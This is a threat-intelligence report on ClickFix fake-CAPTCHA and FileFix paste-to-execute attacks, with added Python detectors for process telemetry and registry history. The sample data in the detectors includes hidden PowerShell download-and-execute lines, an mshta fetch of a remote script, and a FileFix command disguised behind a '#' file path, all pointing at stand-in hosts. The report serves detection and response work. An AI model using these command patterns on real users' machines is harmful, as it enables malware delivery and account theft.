Full Report
The ClickFix social engineering tactic as an initial access vector using fake CAPTCHA verifications increased by 517% between the second half of 2024 and the first half of this year, according to data from ESET. "The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even
Analysis Summary
# Incident Report: Surge in Deceptive User Interaction Attacks (ClickFix & FileFix Analysis)
## Executive Summary
This analysis summarizes a sharp increase in deceptive social engineering tactics, specifically the ClickFix method (a fake CAPTCHA or error prompt that talks the user into copying a command and pasting it into the Run dialog or a terminal) and an alternative proof of concept, **FileFix**, which moves the paste target to the File Explorer address bar. These methods are leading to the deployment of infostealers, ransomware, and Remote Access Trojans (RATs). The report covers the mechanics of both techniques, associated phishing campaigns that use aged domains and legitimate platforms such as Vercel, and the range of payloads observed globally.
## Incident Details
- Discovery Date: Throughout H1 2025 (Data presented focuses on observed trends leading up to June 26, 2025)
- Incident Date: Ongoing/H1 2025 Trend Analysis
- Affected Organization: Multi-sectoral targets observed globally, with high detection volumes in Japan, Peru, Poland, Spain, and Slovakia.
- Sector: Cross-industry (General threat observed across organizations utilizing web interactions/email)
- Geography: Global (Focus on Japan, Peru, Poland, Spain, Slovakia)
## Timeline of Events
### Initial Access
- Date/Time: Ongoing (Reported 517% increase in H1 2025 vs H2 2024)
- Vector (ClickFix): Social engineering via a fake CAPTCHA verification or bogus error message on a malicious web page. The page places a command on the clipboard and instructs the victim to paste it into the Windows Run dialog (Win+R) or the macOS Terminal and press Enter.
- Vector (FileFix PoC): Social engineering via a fake document-sharing prompt. After clicking an "Open File Explorer" button, the victim is told to press CTRL+L and paste a "file path" into the File Explorer address bar. The clipboard actually holds a PowerShell command followed by a `#` comment containing a plausible-looking Windows path, so the path is what the victim sees in the address bar while the command in front of it is what runs.
- Details: In both cases the command executes with the privileges of the logged-in user, as a child of the shell process that handled the input (on Windows, explorer.exe). ClickFix relies on the Run dialog or terminal executing whatever is pasted; FileFix relies on the File Explorer address bar accepting a program name plus arguments and launching it rather than treating the text as a path.
### Lateral Movement
- Not explicitly detailed in the article regarding lateral movement *after* initial access, but the resulting malware payloads suggest potential for C2 communication and internal reconnaissance (e.g., Remcos RAT, XWorm).
### Data Exfiltration/Impact
- Impact Payload Diversity: Attacks lead to the deployment of infostealers, ransomware, Remote Access Trojans (RATs), cryptominers, post-exploitation tools, and custom nation-state aligned malware.
### Detection & Response
- Detection: ESET detected a 517% surge in ClickFix related threats in H1 2025. Various security vendors tracked associated phishing and malware campaigns (TXTag, Remcos, XWorm, Lumma Stealer).
- Response actions taken: Not detailed; this is a threat intelligence aggregation report rather than a specific incident response timeline focusing on a single victim organization.
## Attack Methodology
| Stage | Method/Techniques Used |
| :--- | :--- |
| **Initial Access** | ClickFix (Fake CAPTCHA/Run Dialog Script Paste); FileFix (File Explorer Path Execution); Phishing Email Lures (Mailbox full warnings, DMV tolls, SharePoint redirects). |
| **Persistence** | Implied persistence via deployed malware payloads (RATs, cryptominers). |
| **Privilege Escalation** | Not explicitly detailed, but dependency on user execution of scripts/commands may grant initial user-level access. |
| **Defense Evasion** | Hosting on legitimate services: pages on `*.sharepoint[.]com` subdomains or on Vercel inherit the platform's reputation and are less likely to be blocked by URL-reputation filtering or flagged by AV/EDR. Strategic domain aging (LLDs): domains are registered well before use so they are no longer "newly registered" when the campaign launches. |
| **Credential Access** | Directly targeting credentials via spoofed Microsoft Teams pages, mailbox full warnings, and DMV/toll credential harvesting sites. |
| **Discovery** | Implied investigation by deployed RATs/Post-exploitation tools. |
| **Lateral Movement** | Implied via capabilities of deployed RATs (e.g., Remcos RAT). |
| **Collection** | Harvesting for personal/financial information, Microsoft account credentials, and general data via deployed stealers (Lumma Stealer) or RATs. PDF links used as initial drop points. |
| **Exfiltration** | Not detailed, pending data type; assumed to be handled by deployed malware families. |
| **Impact** | Full control via LogMeIn impersonation payload; operational disruption via ransomware; data theft via stealers. |
## Impact Assessment
- Financial: Not quantified, but associated with costs from ransomware, remediation, and data breach liabilities.
- Data Breach: Credentials stolen (Microsoft accounts), personal/financial information harvested (DMV lures), general data loss via Stealers (e.g., Lumma).
- Operational: Potential for significant disruption via deployment of ransomware or full remote control via RATs/LogMeIn payloads.
- Reputational: Damage associated with compromised credentials and the deceptive nature of the attacks (impersonating MS services, DMVs).
## Indicators of Compromise
*Note: Due to the nature of the report focusing on *techniques*, specific IOCs are limited to examples cited in associated campaigns.*
- **Network indicators**: Connections to aged domains registered for the campaigns; connections to attacker-controlled sites hosted on Vercel; subsequent C2 traffic from the deployed payloads.
- **File indicators**: Malicious LNK files delivered in ZIP archives; execution scripts related to ClickFix/FileFix manipulation; payloads including XWorm malware or Lumma Stealer.
- **Behavioral indicators**: Endpoint telemetry, not network traffic, is where these techniques show up first: `explorer.exe` spawning `powershell.exe`, `cmd.exe`, or `mshta.exe` with a command line that came from a web page (for FileFix, a PowerShell command followed by a `#` comment holding a document-looking path); the pasted text persisting in the per-user `RunMRU` (Run dialog) and `TypedPaths` (Explorer address bar) registry keys; and outbound connections from those child processes to C2 infrastructure shortly after the social engineering interaction.
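The behavioral indicators above (and the FileFix mechanics described under Initial Access) translate directly into a process-creation rule. The following is an added example, not code from the original report or from any vendor cited in it: it scans constructed Sysmon Event ID 1-style records for an interpreter launched as a child of `explorer.exe` with a ClickFix- or FileFix-looking command line. The field names, the `example.invalid` URLs, and the indicator list are assumptions; the list is a starting point, not a complete signature set.

```python
"""Flag ClickFix/FileFix-style launches in process-creation telemetry.

Added example, not code from the original report. Records are constructed
in a Sysmon Event ID 1 style; the field names and the example.invalid
URLs are assumptions.
"""
import re

# Interpreters that the Run dialog or the Explorer address bar hand the
# pasted text to. Both launch their child under explorer.exe.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
          "wscript.exe", "cscript.exe"}

# Fragments common in ClickFix one-liners pasted into Win+R.
CLICKFIX_PATTERNS = [
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.I),
    re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
]

# FileFix: a PowerShell command followed by '#' and a document-looking path.
# PowerShell treats everything after '#' as a comment; the victim only saw
# the path part in the address bar.
FILEFIX_PATTERN = re.compile(
    r'#\s*(?:[A-Za-z]:\\|\\\\)[^"]*\.(?:docx?|xlsx?|pptx?|pdf)\b', re.I)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return (verdict, reasons) for one process-creation record."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent != "explorer.exe" or image not in SHELLS:
        return "benign", []
    reasons = [f"{image} launched as a child of explorer.exe"]
    if FILEFIX_PATTERN.search(cmd):
        reasons.append("FileFix: command followed by a '#' comment holding a document path")
    for pat in CLICKFIX_PATTERNS:
        if pat.search(cmd):
            reasons.append(f"ClickFix indicator /{pat.pattern}/")
    # A bare 'powershell' typed into Run is routine; escalate only on indicators.
    verdict = "suspicious" if len(reasons) > 1 else "info"
    return verdict, reasons


def scan(events):
    """Classify every record; returns [(index, verdict, reasons), ...]."""
    return [(i, *classify(e)) for i, e in enumerate(events)]


# Constructed sample records (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,            # ClickFix-style
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,            # FileFix-style
     "CommandLine": r"powershell.exe -c ping example.invalid # C:\company\internal-secure\filedrive\HRPolicy.docx"},
    {"ParentImage": r"C:\Windows\explorer.exe",                          # ClickFix via mshta
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,            # user opened a shell
     "CommandLine": "powershell"},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe", "Image": PS,  # not from explorer
     "CommandLine": 'powershell -c "Get-Date"'},
]

if __name__ == "__main__":
    for idx, verdict, reasons in scan(SAMPLE_EVENTS):
        print(idx, verdict, "; ".join(reasons))
```

The parent-process relation is the anchor: a legitimately launched shell from a Start menu shortcut or from the Run dialog also has `explorer.exe` as its parent, which is why the rule only escalates to `suspicious` when the command line carries a download-and-execute or comment-padding indicator. Feed it the real `CommandLine` field and expect to tune the patterns against your own baseline of administrative one-liners.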
## Response Actions
- **Containment**: Identifying and blocking attacker infrastructure related to deployed payloads (RATs, Stealers) once identified. Restricting access from known malicious IPs/domains (if attributed).
- **Eradication**: Removing persistent malware (RATs, Stealers, Cryptominers) from infected endpoints once confirmed via threat intelligence feeds.
- **Recovery**: Forcing password resets for compromised Microsoft accounts; system reimaging where necessary following confirmed RAT deployment (e.g., Remcos).
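Before reimaging, responders usually want to know exactly what the user pasted, and Windows keeps that text per user: the Run dialog writes it to `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (values `a`, `b`, ... each ending in `\1`, ordered by `MRUList`) and the Explorer address bar writes it to `...\Explorer\TypedPaths` (values `url1`, `url2`, ..., newest first). The following added example, not code from the original report, parses a constructed `.reg` export of those two keys and flags entries that look like pasted commands; the host name, user name, and commands in the sample export are made up.

```python
r"""Triage Run-dialog and Explorer address-bar history for pasted commands.

Added example, not code from the original report. It parses a constructed
.reg export (paths and commands are made up) of two per-user keys:
  ...\Explorer\RunMRU      values a, b, ...: text entered in Win+R, each
                           stored with a trailing '\1'; MRUList orders the
                           letters most recent first
  ...\Explorer\TypedPaths  values url1, url2, ...: text entered in the
                           Explorer address bar, url1 being the newest
"""
import re

RUNMRU = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
TYPEDPATHS = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"

KEY_RE = re.compile(r"^\[(.+)\]$")
STR_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Entries worth a second look: an interpreter with arguments, a URL, or the
# FileFix '#' comment followed by a drive path.
SUSPICIOUS_RE = re.compile(
    r"^(?:powershell|pwsh|cmd|mshta|wscript|cscript)(?:\.exe)?\s+\S|https?://|#\s*[a-z]:\\",
    re.I)


def _unescape(s):
    # .reg files escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return {key_path: {value_name: string_data}} for REG_SZ values."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = STR_RE.match(line)
        if m and current is not None:
            keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def run_history(keys):
    """Run-dialog entries, most recent first, trailing backslash-1 removed."""
    k = keys.get(RUNMRU, {})
    out = []
    for letter in k.get("MRUList", ""):
        v = k.get(letter)
        if v is not None:
            out.append(v[:-2] if v.endswith("\\1") else v)
    return out


def typed_paths(keys):
    """Address-bar entries, most recent first (url1, url2, ...)."""
    k = keys.get(TYPEDPATHS, {})
    names = sorted((n for n in k if re.fullmatch(r"url\d+", n)),
                   key=lambda n: int(n[3:]))
    return [k[n] for n in names]


def triage(reg_text):
    """Return [(source, entry, flagged), ...] over both histories."""
    keys = parse_reg(reg_text)
    rows = [("RunMRU", e) for e in run_history(keys)]
    rows += [("TypedPaths", e) for e in typed_paths(keys)]
    return [(src, e, bool(SUSPICIOUS_RE.search(e))) for src, e in rows]


# Constructed export, not from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iex (irm https://example.invalid/v)\"\\1"
"MRUList"="ba"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths]
"url1"="powershell.exe -c ping example.invalid # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx"
"url2"="C:\\Users\\alice\\Documents"
'''

if __name__ == "__main__":
    for src, entry, flagged in triage(SAMPLE_REG):
        print("!!" if flagged else "  ", src, entry)
```

On a live host export the two keys with `reg export` (or pull the user's `NTUSER.DAT` from a forensic image) and pass the text to `triage`. Both keys survive a reboot and a cleared clipboard, so they are usually the quickest confirmation that a reported "CAPTCHA" or "document" prompt actually led to a pasted command, and the recovered command line tells you which payload stage to hunt for next.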
## Lessons Learned
- User interaction attacks (copy/paste of commands into system dialogs that execute as the logged-in user: Run, Terminal, the File Explorer address bar) are proving extremely effective and scalable, with a high observed growth rate (517% for ClickFix). No exploit is involved; the user supplies the execution step that an EDR would otherwise have to catch a malicious document or dropper performing.
- Threat actors are actively weaponizing legitimate/trusted platforms (SharePoint, Vercel) and techniques (Strategic Domain Aging) to bypass traditional security controls (EDR/AV).
- Malware chains are highly diverse, ranging from simple credential harvesting to deploying advanced RATs and custom nation-state malware.
## Recommendations
- **Implement robust user awareness training** specifically targeting copy/paste commands executed in system dialogs (Run, Terminal, File Explorer address bar), highlighting that IT support or vendor prompts will rarely require this action.
- **Add behavioral EDR/antivirus rules** for the FileFix PoC pattern: a PowerShell command line, launched as a child of `explorer.exe`, that ends in a `#` comment containing a legitimate-looking Windows path (the comment hides the command behind what the user believes is a file path). Pair this with PowerShell script block logging so the pasted command is recorded even if the window was hidden.
- **Increase scrutiny on emails originating from known legitimate external services** (like SharePoint links) and implement stricter gateway filtering for attachments often used in multi-stage delivery (e.g., LNK files in ZIP archives).
- **Implement Zero Trust and application-control measures** that limit what a standard user account can execute from the Run dialog or the File Explorer address bar: application allow-listing (AppLocker or WDAC) for script hosts such as `powershell.exe`, `mshta.exe`, and `wscript.exe`, PowerShell Constrained Language Mode for non-administrators, and, where the Run dialog is not needed, the Group Policy that removes it (`NoRun`). These reduce the blast radius when training fails and a user pastes anyway.